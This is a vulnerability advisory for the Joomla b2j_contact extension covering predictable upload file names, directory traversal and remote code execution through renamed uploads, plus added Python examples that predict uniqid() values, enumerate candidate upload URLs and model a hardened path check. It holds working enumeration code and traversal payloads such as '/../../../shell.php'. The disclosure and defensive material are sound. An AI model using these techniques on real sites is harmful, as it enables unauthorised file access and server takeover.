Joomla b2j_contact multiple vulnerabilities < CVE-2017-5214, CVE-2017-5215 >
================================================================================

title:               Joomla b2j_contact multiple vulnerabilities
vulnerable products: b2j_contact
vulnerable version:  all versions < 2.1.13
fixed version:       2.1.13
impact:              Critical
found:               2016-12-27
by:                  Navixia Red Team
                     Navixia SA
                     https://navixia.com

================================================================================

Vendor/product description:
---------------------------

B2J Contact is one of the most popular extensions from Codextrous. It is used
to create contact forms.

URL: https://extensions.joomla.org/extension/b2j-contact

Vulnerability overview/description:
-----------------------------------

1# Insecure file access

Files uploaded as attachments to the contact form are saved on the server in a
folder that is reachable through the web server without any restriction.
Furthermore, the files are renamed using a guessable pattern.

2# Directory traversal

By changing the file name submitted in the HTTP POST request, it is possible to
save the file to a different directory.

3# Remote code execution

Although the MIME type of the uploaded file is checked, it is possible to change
the extension of the file written on the server, and thus the way the web
server interprets it. It is then possible to upload an executable file (aspx)
and execute commands on the server.

Proof of concept:
-----------------

1# Insecure file access

When a file is uploaded through the b2j_contact form, the following function is
used (file: helpers/b2juploader.php):

    protected function DoUpload()
    {
        ...
        // original file name and content come straight from the POST request
        $file = JRequest::getVar('b2jstdupload', NULL, 'files', 'array');
        ...
        // web-reachable directory under the site root
        $upload_directory = JPATH_SITE . "/components/" . $GLOBALS["com_name"] . "/uploads/";
        ...
        $filename = JFile::makeSafe($file['name']);
        // time-based prefix: uniqid() is derived from microtime()
        $filename = uniqid() . "-" . $filename;
        $dest = $upload_directory . $filename;

The original file name is taken from the POST request and passed through
JFile::makeSafe(), which is meant to strip characters outside a conservative
allow-list (essentially Latin letters and digits plus a few punctuation
characters). The destination directory is
JPATH_SITE . "/components/" . $GLOBALS["com_name"] . "/uploads/", which in most
installations resolves to /components/com_b2jcontact/uploads/ under the web
root. The final file name is the output of uniqid(), followed by the character
"-" and the sanitised original name.

uniqid() is derived from microtime() and is therefore predictable: without a
prefix or the "more entropy" flag it is the number of seconds since the epoch
as 8 hexadecimal digits followed by the microsecond part as 5 hexadecimal
digits. From a given microtime() value the uniqid() output can be reproduced
with:

    $m  = microtime(true);
    // same format uniqid() uses: 8 hex digits of seconds, 5 hex digits of microseconds
    $m2 = sprintf("%08x%05x", floor($m), ($m - floor($m)) * 1000000);

This means that if a file named navixia.png is uploaded, it becomes accessible
at the following URL:

    /components/com_b2jcontact/uploads/XXXXXXXXXXXXX-navixia.png

where the 13-character XXXXXXXXXXXXX can be guessed in a number of tries that
depends on the precision of the server clock: start from the value
corresponding to microtime() at the moment the file was uploaded and increment
it until the right one is found.

################################################################################

2# Directory traversal

The guessable prefix described in #1 can be bypassed altogether using the usual
directory traversal characters. For example, if the file name submitted in the
HTTP POST request is changed to "/../navixia.png", the $dest value becomes

    /components/com_b2jcontact/uploads/586cfc73826e4-/../navixia.png

which the filesystem resolves to

    /components/com_b2jcontact/uploads/navixia.png

so the attacker knows the exact location of the file without guessing the
prefix, and additional "../" segments move the file outside the uploads
directory.

################################################################################

3# Remote code execution

Upload of an unrestricted file type

On the authenticated part of the b2j contact form, the file extension
restriction can be bypassed by uploading a file with an allowed extension (for
example PNG or JPG) and then using the "rename file" function to change the
extension. Since the uploads directory is served directly by the web server
(#1), the renamed file is then executed by whatever handler the server
associates with the new extension. The advisory names aspx as the example;
note that Joomla itself runs on PHP, so on a typical Apache/PHP host the
relevant extension is .php.
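Worked example for #1: predicting uniqid() and enumerating candidate upload URLs. This is an added example written for this page; it is not part of the Navixia advisory or of the b2j_contact extension. The upload directory is the default path the advisory gives, the file name and the fake "server" are constructed for the demonstration, and the id 586cfc73826e4 is taken from the advisory's traversal example (it decodes to 2017-01-04 14:25:23.534244 UTC). No network access is performed; in real use the `exists` callback would issue an HTTP HEAD request.

```python
"""Predict PHP uniqid() values and enumerate candidate b2j_contact upload URLs.

Added example, not code from the advisory or the extension. UPLOAD_DIR is the
default path named in the advisory; everything else is constructed.
"""
from typing import Callable, Iterator, Optional

UPLOAD_DIR = "/components/com_b2jcontact/uploads/"   # default path from the advisory
ADVISORY_UID = "586cfc73826e4"                       # id from the advisory's PoC #2


def php_uniqid(sec: int, usec: int) -> str:
    """Reproduce PHP's uniqid() (no prefix, no more_entropy): 8 hex digits of
    seconds since the epoch followed by 5 hex digits of microseconds."""
    if not 0 <= usec < 1_000_000:
        raise ValueError("usec must be in [0, 1000000)")
    return f"{sec:08x}{usec:05x}"


def parse_uniqid(uid: str) -> tuple[int, int]:
    """Inverse of php_uniqid(): recover (seconds, microseconds) from a 13-char id."""
    if len(uid) != 13:
        raise ValueError("uniqid() output is 13 hex characters")
    return int(uid[:8], 16), int(uid[8:], 16)


def split_timestamp(ts: float) -> tuple[int, int]:
    """Turn a float UNIX timestamp (e.g. time.time()) into (sec, usec)."""
    sec = int(ts)
    return sec, int(round((ts - sec) * 1_000_000))


def candidate_ids(start: tuple[int, int], count: int, step_us: int = 1) -> Iterator[str]:
    """Yield `count` uniqid() values starting at (sec, usec), increasing by
    `step_us` microseconds each time. Raise step_us when the server clock is
    known to be coarser than 1 us; this shrinks the search space accordingly."""
    sec, usec = start
    for _ in range(count):
        yield php_uniqid(sec, usec)
        usec += step_us
        sec, usec = sec + usec // 1_000_000, usec % 1_000_000


def find_upload(filename: str, start: tuple[int, int], count: int,
                exists: Callable[[str], bool], step_us: int = 1) -> Optional[str]:
    """Probe candidate URLs in time order with `exists` (for a live target this
    would wrap an HTTP HEAD and return True on 200) and return the first hit.

    Worst case is 1,000,000 candidates per second of uncertainty about the
    upload time, so a tight observation window and a realistic step_us matter.
    """
    for uid in candidate_ids(start, count, step_us):
        url = f"{UPLOAD_DIR}{uid}-{filename}"
        if exists(url):
            return url
    return None


def demo() -> Optional[str]:
    """Constructed scenario: the server stored navixia.png under ADVISORY_UID and
    we observed the upload 50 ms earlier, so we search a 100 ms window."""
    stored = f"{UPLOAD_DIR}{ADVISORY_UID}-navixia.png"
    sec, usec = parse_uniqid(ADVISORY_UID)
    observed = (sec, usec - 50_000)           # our own clock at upload time
    probes = 0

    def fake_head(url: str) -> bool:          # stands in for a HEAD request
        nonlocal probes
        probes += 1
        return url == stored

    found = find_upload("navixia.png", observed, 100_000, fake_head)
    print(f"found {found} after {probes} probes")
    return found


if __name__ == "__main__":
    demo()
```

The search is ordered by time because uniqid() is monotonic in practice; if the attacker's clock is ahead of the server's, `start` has to be moved back by the expected skew before enumerating.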
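Worked example for #2 and #3: the destination-path computation the advisory describes, next to a hardened version that neutralises the traversal and enforces an extension allow-list on the final name (which a "rename" feature must call as well). This is an added example written for this page, not the extension's code or the vendor's fix. The document-root prefix, the extension allow-list and the sample file names are assumptions made for the demonstration.

```python
"""Model the vulnerable destination path of DoUpload() and a hardened variant.

Added example; not the extension's code. UPLOAD_DIR assumes a docroot of
/var/www/html, and ALLOWED_EXT is an assumed allow-list.
"""
import posixpath
import re

UPLOAD_DIR = "/var/www/html/components/com_b2jcontact/uploads/"   # assumed
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif", "pdf"}                 # assumed

_DISALLOWED_CHARS = re.compile(r"[^A-Za-z0-9._-]")


def vulnerable_dest(uid: str, submitted_name: str) -> str:
    """Where the file actually lands when uniqid() . '-' . name is concatenated
    onto the upload directory and, as the advisory observes, a '/../' in the
    submitted name survives into the path. normpath() shows the resolved path."""
    return posixpath.normpath(f"{UPLOAD_DIR}{uid}-{submitted_name}")


def safe_dest(uid: str, submitted_name: str, allowed_ext=ALLOWED_EXT) -> str:
    """Hardened replacement. Raises ValueError on anything it will not store."""
    # 1. drop every directory component the client sent (also Windows-style)
    base = posixpath.basename(submitted_name.replace("\\", "/"))
    # 2. allow-list characters, collapse dot runs, forbid a leading dot
    base = _DISALLOWED_CHARS.sub("", base)
    base = re.sub(r"\.{2,}", ".", base).lstrip(".")
    if not base:
        raise ValueError("empty file name after sanitisation")
    # 3. decide on the final extension, not the MIME type; a rename must
    #    go through this same check or shell.png becomes shell.php
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in allowed_ext:
        raise ValueError(f"extension {ext!r} not allowed")
    # 4. defence in depth: the resolved path must still be inside UPLOAD_DIR
    root = UPLOAD_DIR.rstrip("/")
    dest = posixpath.normpath(posixpath.join(UPLOAD_DIR, f"{uid}-{base}"))
    if posixpath.commonpath([dest, root]) != root:
        raise ValueError("destination escapes the upload directory")
    return dest


def demo() -> dict:
    """Run both variants over the advisory's traversal name and a few
    constructed attacker names; returns the outcome per input."""
    uid = "586cfc73826e4"
    results = {
        "vuln_traversal": vulnerable_dest(uid, "/../navixia.png"),
        "vuln_escape": vulnerable_dest(uid, "/../../../shell.php"),
        "safe_plain": safe_dest(uid, "navixia.png"),
        "safe_traversal": safe_dest(uid, "/../navixia.png"),
    }
    for bad in ("shell.php", "shell.png.php", ".htaccess", ".."):
        try:
            results[bad] = safe_dest(uid, bad)
        except ValueError as err:
            results[bad] = f"rejected: {err}"
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:15} {outcome}")
```

Note that the extension check only closes the rename path described in #3; the web-reachable uploads directory from #1 remains a design weakness, and the usual fix is to store attachments outside the web root (or deny script execution in that directory) in addition to validating names.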
################################################################################

Vendor contact timeline:
------------------------

2017-01-03: Contacted vendor.
2017-01-04: Sent advisory and proof-of-concept exploit to Codextrous.
2017-01-05: Vendor confirmed the vulnerabilities.
2017-01-14: Vendor released security patch 2.1.13.
2017-05-08: Advisory released.

Solution:
---------

Update b2j_contact to 2.1.13 or later.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Navixia Red Team
route du bois 1
1024 Ecublens
Switzerland
https://navixia.com